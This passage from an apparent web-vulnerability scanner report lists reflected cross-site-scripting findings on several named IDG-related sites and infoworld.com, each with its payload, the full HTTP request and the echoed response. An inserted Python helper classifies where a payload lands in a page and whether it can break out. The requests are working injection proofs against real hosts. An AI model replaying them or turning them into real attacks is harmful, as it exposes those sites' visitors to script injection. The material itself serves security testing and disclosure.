Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.idgknowledgehub.com/blogs/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:25:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG Knowledge Hub :
...[SNIP]...
<p>You
       tried going to http://www.idgknowledgehub.com/blogs/blogs/?cat=1b5964<script>alert(1)</script>40a9d0fc7f1
       and it doesn't exist. All is not lost! You can click back
       and try again or search for what you're looking for:
        <form method="get" id="searchform" action="idgknowledgehub.com/blogs/index.php
...[SNIP]...

2.331. http://www.idgknowledgehub.com/blogs/ [tag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idgknowledgehub.com
Path:   /blogs/

Issue detail

The value of the tag request parameter is copied into the HTML document as plain text between tags. The payload 45eef<script>alert(1)</script>6a4993aa7eb was submitted in the tag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/?tag=digital-marketing-news45eef<script>alert(1)</script>6a4993aa7eb HTTP/1.1
Host: www.idgknowledgehub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:25:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.idgknowledgehub.com/blogs/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 16 Dec 2010 13:25:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG Knowledge Hub :
...[SNIP]...
<p>You
       tried going to http://www.idgknowledgehub.com/blogs/blogs/?tag=digital-marketing-news45eef<script>alert(1)</script>6a4993aa7eb
       and it doesn't exist. All is not lost! You can click back
       and try again or search for what you're looking for:
        <form method="get" id="searchform" action="idgknowledgehub.com/blogs/index.php
...[SNIP]...

2.332. http://www.idgknowledgehub.com/library/ [video parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idgknowledgehub.com
Path:   /library/

Issue detail

The value of the video request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c6c'%3balert(1)//46fddd9382d was submitted in the video parameter. This input was echoed as 65c6c';alert(1)//46fddd9382d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /library/?video=CorpOverview65c6c'%3balert(1)//46fddd9382d HTTP/1.1
Host: www.idgknowledgehub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:27:33 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 12003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG Knowledge Hub</
...[SNIP]...
'width', '505',
'height', '660',
'src', '/flash/verticalVideoPlayer?xmlPath=/flash/xml/vidLibrary.xml&flvsPath=/flvs/&imagePath=/flash/img/&swfPath=/flash/&gotoVid=CorpOverview65c6c';alert(1)//46fddd9382d',
'quality', 'high',
'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
'align', 'middle',
'play', 'true',
'loop', 'true',

...[SNIP]...

2.333. http://www.idgmarketfusion.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idgmarketfusion.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88c9b"-alert(1)-"814141dc9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?88c9b"-alert(1)-"814141dc9b3=1 HTTP/1.1
Host: www.idgmarketfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:30:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?88c9b"-alert(1)-"814141dc9b3=1");
} catch(err) {}</script>
...[SNIP]...

2.334. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d6f7<script>alert(1)</script>f6dba030f35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /internet/wwsites.nsf/vwWebPublished5d6f7<script>alert(1)</script>f6dba030f35/sol_explore-precision-marketing_us HTTP/1.1
Host: www.infoprint.com
Proxy-Connection: keep-alive
Referer: http://www.infoprint.com/precisionmarketing
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 14:06:05 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 22591
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- @GetHTTPHeader("Host"): www.infoprint.com -->
<!-- @ServerName: CN=XSW102/OU=A
...[SNIP]...
<br />
URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished5d6f7<script>alert(1)</script>f6dba030f35/sol_explore-precision-marketing_us
<br />
...[SNIP]...

2.335. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac58d<script>alert(1)</script>f03067f6e47 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_usac58d<script>alert(1)</script>f03067f6e47 HTTP/1.1
Host: www.infoprint.com
Proxy-Connection: keep-alive
Referer: http://www.infoprint.com/precisionmarketing
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 14:08:05 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 22516
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- @GetHTTPHeader("Host"): www.infoprint.com -->
<!-- @ServerName: CN=XSW101/OU=A
...[SNIP]...
<br />
URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_usac58d<script>alert(1)</script>f03067f6e47
<br />
...[SNIP]...

2.336. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f8dc7<script>alert(1)</script>364b444742b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us?f8dc7<script>alert(1)</script>364b444742b=1 HTTP/1.1
Host: www.infoprint.com
Proxy-Connection: keep-alive
Referer: http://www.infoprint.com/precisionmarketing
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 14:05:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 22519
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- @GetHTTPHeader("Host"): www.infoprint.com -->
<!-- @ServerName: CN=XSW102/OU=A
...[SNIP]...
<br />
URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_us?f8dc7<script>alert(1)</script>364b444742b=1
<br />
...[SNIP]...

2.337. http://www.infoprint.com/precisionmarketing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /precisionmarketing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3181b<script>alert(1)</script>0c72c958252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /precisionmarketing?3181b<script>alert(1)</script>0c72c958252=1 HTTP/1.1
Host: www.infoprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:33:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 22476
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- @GetHTTPHeader("Host"): www.infoprint.com -->
<!-- @ServerName: CN=XSW101/OU=A
...[SNIP]...
<br />
URL: http://www.infoprint.com/internet/wwsites.nsf/vwwebpublished/sol_explore-precision-marketing_us?3181b<script>alert(1)</script>0c72c958252=1
<br />
...[SNIP]...

2.338. http://www.infoworld.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e03"><script>alert(1)</script>3e112396eea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?source=AFL-idgcom&42e03"><script>alert(1)</script>3e112396eea=1 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:34:11 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506451-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
lang="en"

...[SNIP]...
<a href="/user?destination=urce=AFL-idgcom&42e03"><script>alert(1)</script>3e112396eea=1">
...[SNIP]...

2.339. http://www.infoworld.com/ [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e55"><script>alert(1)</script>dea07337aa4 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?source=AFL-idgcomd9e55"><script>alert(1)</script>dea07337aa4 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:42 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506422-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
lang="en"

...[SNIP]...
<a href="/user?destination=urce=AFL-idgcomd9e55"><script>alert(1)</script>dea07337aa4">
...[SNIP]...

2.340. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1187"><script>alert(1)</script>2b778c3617c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de1187"><script>alert(1)</script>2b778c3617c/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:33:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:47 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506427-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/de1187"><script>alert(1)</script>2b778c3617c/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429" />
...[SNIP]...

2.341. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9363b"><script>alert(1)</script>996c4f5d80b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing9363b"><script>alert(1)</script>996c4f5d80b/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:33:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:50 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506430-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/d/cloud-computing9363b"><script>alert(1)</script>996c4f5d80b/googles-stealthy-plan-get-you-microsoft-exchange-429" />
...[SNIP]...

2.342. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd36"%3b43914d62c2f was submitted in the REST URL parameter 2. This input was echoed as efd36";43914d62c2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. The scanner did not find a full proof of concept for executing arbitrary JavaScript, which is why the confidence is Firm rather than Certain; examine the application's behaviour manually for input validation or other obstacles. Two points are worth checking by hand: the string sits in a script block whose <!-- //--> wrapper is the old script-hiding idiom and offers no protection, and the preceding finding shows the same path segment echoed into the canonical link with angle brackets intact, so confirm whether a </script> sequence in this parameter is also reflected unmodified into the script block.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, emit the value as a JSON-encoded string literal with the characters < and > additionally escaped as \u003c and \u003e, because a literal </script> inside the data ends the script element at the HTML level no matter how the JavaScript string is escaped.

Request

GET /d/cloud-computingefd36"%3b43914d62c2f/googles-stealthy-plan-get-you-microsoft-exchange-429 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:33:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:51 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506431-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<!--
var url_topic = "Cloud Computingefd36";43914d62c2f"
//-->
...[SNIP]...
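Where the scanner stops at Firm confidence, as in 2.342, the tester has to decide by hand what context the reflection landed in and whether the characters needed to leave it survived. The following Python is an added illustration of that check, written for this page; it is neither the scanner's code nor any site's code. It takes a response body and the canary prefix and suffix the report wraps around each payload, classifies the context by looking at what precedes the reflection, and says whether a breakout is still possible. The sample bodies are constructed from the excerpts in this report (the report's own URLs and canary tokens, surrounding markup trimmed); the "hardened js" sample is made up to show the negative case.

```python
"""Locate a scanner canary in a response body, name the context it landed in and
report whether the characters needed to break out of that context survived.
Illustration written for this page, not scanner code.  Sample bodies are built
from the report's excerpts; the 'hardened js' sample is constructed."""
import re


def classify_context(body: str, pos: int) -> str:
    """Context at offset pos, judged from the text before it: 'attribute',
    'comment', 'text', 'js' (bare code) or 'js:<quote>' (inside a string)."""
    before = body[:pos]
    low = before.lower()
    if low.rfind("<script") > low.rfind("</script"):       # an open <script> element
        quote = _open_js_quote(before[low.rfind("<script"):])
        return f"js:{quote}" if quote else "js"
    if low.rfind("<!--") > low.rfind("-->"):               # an open HTML comment
        return "comment"
    if low.rfind("<") > low.rfind(">"):                    # inside a tag
        return "attribute"
    return "text"


def _open_js_quote(script: str):
    """Quote character of an unterminated JS string literal in the code after the
    <script ...> tag, or None.  Honours backslash escapes; ignores JS comments."""
    code = script[script.find(">") + 1:]
    quote, i = None, 0
    while i < len(code):
        c = code[i]
        if quote:
            if c == "\\":
                i += 1                                     # skip the escaped char
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        i += 1
    return quote


def _has_unescaped(s: str, ch: str) -> bool:
    """True if ch occurs in s preceded by an even number of backslashes."""
    return re.search(r"(?<!\\)(?:\\\\)*" + re.escape(ch), s) is not None


def breakout_survived(echoed: str, context: str) -> bool:
    """Did the echoed payload keep what it needs to leave its context?"""
    if context.startswith("js:"):
        # A backslash does protect a JS string literal, but </script> ends the
        # element at the HTML level, which no JavaScript escaping prevents.
        return _has_unescaped(echoed, context[3:]) or "</script" in echoed.lower()
    if context == "js":
        return True                                        # already executing as code
    if context == "attribute":
        # A backslash means nothing in markup: \" still terminates the value.
        return '"' in echoed or "'" in echoed
    if context == "comment":
        return "-->" in echoed
    return "<" in echoed and ">" in echoed                # text: needs a new tag


def analyse(body: str, prefix: str, suffix: str):
    """Every reflection of prefix...suffix as (echoed, context, breakout)."""
    out = []
    for m in re.finditer(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S):
        ctx = classify_context(body, m.start())
        out.append((m.group(1), ctx, breakout_survived(m.group(1), ctx)))
    return out


HEAD = '<html><head><script type="text/javascript">var t = 1;</script>\n'
SAMPLES = {
    # infoworld, REST URL parameter 2 in the canonical <link> (first finding above)
    "canonical link": (HEAD +
        '<link rel="canonical" href="http://www.infoworld.com/d/cloud-computing'
        '9363b"><script>alert(1)</script>996c4f5d80b/googles-stealthy-plan-get-you-microsoft-exchange-429" />\n',
        "9363b", "996c4f5d80b"),
    # infoworld 2.342, double-quoted JS string, no full PoC found by the scanner
    "js double quote": (HEAD +
        '<script type="text/javascript">\n<!--\nvar url_topic = "Cloud Computing'
        'efd36";43914d62c2f"\n//-->\n</script>\n',
        "efd36", "43914d62c2f"),
    # linuxworld 2.349, single-quoted JS string
    "js single quote": (HEAD +
        "<script type=\"text/javascript\">\nvar nw = {\nrequest_uri: '/?"
        "2c766'-alert(1)-'07e601c82bd=1',\nsite: 'home'\n};\n</script>\n",
        "2c766", "07e601c82bd"),
    # lunametrics 2.351: a backslash was added, but the sink is an attribute
    "backslashed attribute": (HEAD +
        '<meta property="og:url" content="http://www.lunametrics.com/blog'
        'a3581\\"><script>alert(1)</script>8af0ac2b3a4/"/>\n',
        "a3581", "8af0ac2b3a4"),
    # constructed negative case: JS-string escaping plus \u003c/\u003e for < and >
    "hardened js": (HEAD +
        '<script>var u = "/blogaaaa1\\"\\u003e\\u003cscript\\u003ealert(1)bbbb2";</script>\n',
        "aaaa1", "bbbb2"),
}


def analyse_samples():
    """Run analyse() over every sample: {name: [(echoed, context, breakout), ...]}."""
    return {name: analyse(body, p, s) for name, (body, p, s) in SAMPLES.items()}
```

Feed analyse() the raw body of the Firm-confidence response with the canary tokens from the Issue detail and read the third element of each tuple; a True next to a js:" context with only a quotation mark in the echo is exactly the 2.342 situation, where the remaining question is whether </script> is reflected intact as well.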

2.343. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac6e"><script>alert(1)</script>3dccd1b97d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-4295ac6e"><script>alert(1)</script>3dccd1b97d3 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:34:04 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506444-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/user?destination=d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-4295ac6e"><script>alert(1)</script>3dccd1b97d3">
...[SNIP]...

2.344. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae1d"><script>alert(1)</script>195ea8c76a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?fae1d"><script>alert(1)</script>195ea8c76a9=1 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

